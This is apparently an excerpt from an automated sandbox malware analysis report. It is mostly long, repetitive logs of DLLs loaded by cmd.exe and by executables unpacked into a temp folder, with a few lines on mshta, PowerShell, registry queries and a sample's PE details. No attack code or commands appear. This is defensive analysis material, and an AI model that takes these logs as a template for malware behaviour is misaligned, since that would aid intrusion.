                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: acgenral.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: msacm32.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: aclayers.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: winhttpcom.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeStatic file information: File size 3545603 > 1048576
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
